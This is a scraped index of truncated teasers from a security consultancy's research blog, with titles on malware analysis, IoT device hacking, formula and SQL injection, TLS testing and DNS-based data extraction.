Careto Malware Masks Ancient but Deadly Virus DNA
Kaspersky recently discovered a new family of malware, dubbed ‘The Mask’ or ‘Careto’, which it described as one of the "most advanced global cyber-espionage operations to date”[1]. This description is...
View ArticleBypassing Windows 8.1 Mitigations using Unsafe COM Objects
In October last year I was awarded the first $100,000 bounty for a Mitigation Bypass in Microsoft Windows. My original plan was to not discuss it in any depth until Microsoft had come up with a...
View ArticleHacking into Internet Connected Light Bulbs
The subject of this blog, the LIFX light bulb, bills itself as the light bulb reinvented; a “WiFi enabled multi-color [sic], energy efficient LED light bulb” that can be controlled from a smartphone...
View ArticleA Cruel Interest: Attacker motivations for targeting the financial services...
A question we often get asked is “why would APTs target my organisation, what could a state sponsored attacker possibly want with us?” While the core areas of government and the defence establishment...
View ArticleComma Separated Vulnerabilities
This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command...
View ArticleUpcoming service announcement: IRIS, a new aperture on Incident Response
Rapid incident response is a core function of Context's Response division and we pride ourselves on the close relationships and integration we build with our clients. However, we have found an...
View ArticleHacking Canon Pixma Printers - Doomed Encryption
This blog post is another in the series demonstrating current insecurities in devices categorised as the ‘Internet of Things’. This instalment will reveal how the firmware on Canon Pixma printers...
View ArticleRDP Replay
Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons. Firstly the client was not...
View ArticleEvasive Measures: "faxmessage.php" malware delivery
In the ongoing malware arms race attackers are always trying to find creative ways to bypass detection, and this isn’t something that is limited to targeted threat actors. In fact some ingenious...
View ArticleClik here to view.
Automating Removal of Java Obfuscation
In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity...
View ArticleThanks for the Memories: Identifying Malware from a Memory Capture
We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's...
View ArticleRFID Tags in Access Control Systems
One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag...
View ArticleSQL Inception: How to select yourself
In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an...
View ArticleBreaking the law: the legal sector remains an attractive target; why not turn...
The legal sector will remain an attractive target for the full spectrum of threat actors; cyber-criminals, hacktivists, state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive...
View ArticleWireless Gridlock in the IoT
“What good is a phone call when you are unable to speak?”IntroductionWhen people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic...
View ArticleThe Emergence of Bluetooth Low Energy
IntroductionThis blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core...
View ArticleManually Testing SSL/TLS Weaknesses
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known...
View ArticleThe recent US government data breach: big data techniques, a driving force...
The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees.In a...
View ArticleVulnerability Statistics & Trends in 2015
I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research...
View ArticleDNSWatch - When a full DNS tunnel is just too much
During certain engagements it is a requirement to extract data from a network - or at least prove that it would be possible in different ways. One common and very well-known way to do this is to...
View Article